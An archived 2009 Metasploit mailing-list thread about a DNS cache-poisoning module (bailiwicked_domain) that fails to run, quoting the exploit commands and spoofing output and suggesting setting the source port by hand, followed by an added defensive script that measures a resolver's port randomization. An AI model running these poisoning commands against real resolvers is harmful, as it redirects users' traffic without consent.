Metasploit mailing list archives
bailiwicked_domain not working anymore?
From: j.s.sebastian at gmail.com (Paolo Milani)
Date: Mon, 20 Jul 2009 17:09:54 +0200
Hi,

I had the same problem. The thing is that the authoritative nameserver used to find out the source port used by the recursive server is not running anymore. Quoting my previous email to this list:

"To check if a server is vulnerable (uses a static source port), and to find out which port it uses, this module sends TXT queries for domains like:

spoofprobe-check-1-9997847822.red.metasploit.com

I presume that the server for the red subdomain should then reply putting the port number used by the server in the TXT section. Unfortunately this server is down (in fact, the red subdomain does not resolve)."

Since sending back the src port of the server in the TXT section is not standard DNS behavior, and the code for this server doesn't seem to have been released, even if you set up your own authoritative server the check functionality will still not work.

Of course you can set up your own authoritative server, do a query to it through the recursive resolver, and just check which port it uses to query you. Then in metasploit you can just do set SRCPORT <port number>.

ciao
Paolo Milani

Richard Miles wrote:
> Yo
>
> I recently tested the bailiwicked_domain exploit from Metasploit against 2 different servers, and both failed the exploitation.
>
> Both servers show to be vulnerable, similar to this one output:
>
> porttest.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net. "myDNSserver is POOR: 26 queries in 1.9 seconds from 26 ports with std dev 7"
>
> I used this test:
>
> dig +short porttest.dns-oarc.net TXT @myDNSserver
>
> Both DNS servers show to be vulnerable (POOR).
>
> When exploiting with Metasploit, the first problem is that "check" always fails, saying my DNS doesn't accept recursive queries.
>
> msf auxiliary(bailiwicked_domain) > check
> [*] Using the Metasploit service to verify exploitability...
> [*] ERROR: This server is not replying to recursive requests
>
> That is completely wrong, my server accepts recursive queries. Even if I quit metasploit or even open another terminal I can query ANY host in the internet. Is it a known problem?
>
> Well, anyway I tried to exploit the flaw, using this:
>
> msf > use auxiliary/spoof/dns/bailiwicked_domain
> msf auxiliary(bailiwicked_domain) > set RHOST myDNSserver
> RHOST => myDNSserver
> msf auxiliary(bailiwicked_domain) > set DOMAIN sexy.com
> DOMAIN => sexy.com
> msf auxiliary(bailiwicked_domain) > set NEWDNS www.google.com
> NEWDNS => www.google.com
> msf auxiliary(bailiwicked_domain) > set SRCPORT 0
> SRCPORT => 0
> msf auxiliary(bailiwicked_domain) > exploit
> [*] Targeting nameserver myDNSserver for injection of sexy.com. nameservers as www.google.com
> [*] Querying recon nameserver for sexy.com.'s nameservers...
> [*] Got an NS record: XXXXXXXXXXXXXXXX
> [*] Removed: It's just DNS resolution.
> [*] Calculating the number of spoofed replies to send per query...
> [*] race calc: 100 queries | min/max/avg time: 0.04/0.17/0.07 | min/max/avg replies: 4/67/28
> [*] Sending 14 spoofed replies from each nameserver (3) for each query
> [*] Attempting to inject poison records for sexy.com.'s nameservers into myDNSserver:0...
> [*] Sent 1000 queries and 42000 spoofed responses...
> [*] Recalculating the number of spoofed replies to send per query...
> [*] race calc: 25 queries | min/max/avg time: 0.04/103.53/4.22 | min/max/avg replies: 3/65337/2633
> [*] Now sending 1316 spoofed replies from each nameserver (3) for each query
>
> And Metasploit keeps in this stage for a long time (at the moment, more than 1 hour).
>
> Is there anything wrong with the exploit? Or am I using it wrong? I'm following this tutorial:
>
> http://www.caughq.org/exploits/CAU-EX-2008-0003.txt
>
> Any tips are welcome.
>
> thanks

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
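Paolo's suggested replacement for the dead Metasploit check is to run your own authoritative server, send a query through the resolver under test, and look at which source port it used. The script below is an added example (not code from this thread, from Metasploit or from DNS-OARC) that does the assessment half of that, from a defender's point of view: given the UDP source ports and DNS transaction IDs seen at your authoritative server, it reports how many distinct ports were used and their standard deviation, in the same shape as the dns-oarc porttest line quoted above, and also flags sequential transaction IDs, the other half of the 2008 fix. The POOR/GOOD/GREAT thresholds, the probe domain shape and the captured datagrams are all constructed assumptions so the script runs offline; in live use, `observe()` would be fed from `recvfrom()` on your authoritative server's port 53.

```python
"""Assess a resolver's source-port and transaction-ID randomization.

Added example; not code from this thread, from Metasploit or from DNS-OARC.
Assumption: you operate an authoritative nameserver for a zone you own and
capture the UDP datagrams the resolver under test sends to it. Here the
datagrams are constructed inline so the script runs offline.
"""
import statistics
import struct
from typing import Dict, List, Tuple

# Verdict thresholds are this example's own assumptions, loosely modelled on
# the POOR/GOOD/GREAT labels of the dns-oarc porttest output in the thread.
POOR_MAX_STDDEV = 3980.0
GREAT_MIN_STDDEV = 10000.0


def parse_dns_header(packet: bytes) -> Dict[str, int]:
    """Unpack the six 16-bit fields of a DNS message header (RFC 1035 s4.1.1)."""
    if len(packet) < 12:
        raise ValueError("DNS message shorter than the 12-byte header")
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", packet[:12])
    return {"id": txid, "flags": flags, "qdcount": qd,
            "ancount": an, "nscount": ns, "arcount": ar}


def build_query(txid: int, name: str, qtype: int = 16) -> bytes:
    """Build a minimal standard query with RD=1; qtype 16 is TXT, as in the thread."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    labels = name.rstrip(".").split(".")
    qname = b"".join(bytes([len(lbl)]) + lbl.encode("ascii") for lbl in labels)
    return header + qname + b"\x00" + struct.pack("!HH", qtype, 1)


def observe(src_addr: Tuple[str, int], packet: bytes) -> Tuple[int, int]:
    """One observation: (UDP source port, DNS transaction ID) of an inbound query.

    In live use src_addr and packet come from sock.recvfrom() on port 53 of
    the authoritative server; only the source port and TXID matter here.
    """
    return src_addr[1], parse_dns_header(packet)["id"]


def assess(observations: List[Tuple[int, int]]) -> Dict[str, object]:
    """Summarise port/TXID spread over the observed queries and give a verdict."""
    if len(observations) < 2:
        raise ValueError("need at least two observations")
    ports = [p for p, _ in observations]
    txids = [t for _, t in observations]
    port_stddev = statistics.pstdev(ports)
    if port_stddev < POOR_MAX_STDDEV:
        verdict = "POOR"
    elif port_stddev < GREAT_MIN_STDDEV:
        verdict = "GOOD"
    else:
        verdict = "GREAT"
    # Sequential TXIDs are the second weakness the 2008 fixes removed: count +1 steps.
    sequential = sum(1 for a, b in zip(txids, txids[1:]) if (b - a) & 0xFFFF == 1)
    return {
        "queries": len(observations),
        "distinct_ports": len(set(ports)),
        "port_stddev": port_stddev,
        "distinct_txids": len(set(txids)),
        "sequential_txid_steps": sequential,
        "verdict": verdict,
    }


def constructed_samples() -> Dict[str, List[Tuple[int, int]]]:
    """Constructed captures (not real traffic): a static-port and a randomizing resolver."""
    probe = "spoofprobe-check-1-9997847822.red.metasploit.com"  # domain shape from the thread
    static = [observe(("192.0.2.53", 53), build_query(0x1000 + i, probe)) for i in range(26)]
    # Arithmetic progression of ports: 26 distinct values, population std dev exactly 15000.
    spread_ports = [1024 + 2000 * i for i in range(26)]
    spread_txids = [(0x9E37 * (i + 1)) & 0xFFFF for i in range(26)]  # constructed, non-sequential
    randomized = [observe(("192.0.2.53", p), build_query(t, probe))
                  for p, t in zip(spread_ports, spread_txids)]
    return {"static": static, "randomized": randomized}


if __name__ == "__main__":
    for label, obs in constructed_samples().items():
        r = assess(obs)
        print(f"{label}: {r['verdict']}: {r['queries']} queries from "
              f"{r['distinct_ports']} ports with std dev {r['port_stddev']:.0f}, "
              f"{r['sequential_txid_steps']} sequential TXID steps")
```

The static sample comes out POOR with one port and 25 sequential TXID steps; the randomizing sample comes out GREAT with 26 distinct ports and no sequential TXIDs. A resolver you administer should look like the second case; if it looks like the first, the fix is to upgrade or configure the resolver for source-port randomization (the 2008 patches), not to adjust anything on the authoritative side.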
Current thread:
- bailiwicked_domain not working anymore? Richard Miles (Jul 20)
- bailiwicked_domain not working anymore? Paolo Milani (Jul 20)
- bailiwicked_domain not working anymore? HD Moore (Jul 20)
- bailiwicked_domain not working anymore? Richard Miles (Jul 20)
- bailiwicked_domain not working anymore? HD Moore (Jul 20)
- Error while running meterpreter winenum script wfdawson at bellsouth.net (Jul 21)
- Error while running meterpreter winenum script Carlos Pérez (Jul 21)
- bailiwicked_domain not working anymore? HD Moore (Jul 20)
- bailiwicked_domain not working anymore? Paolo Milani (Jul 20)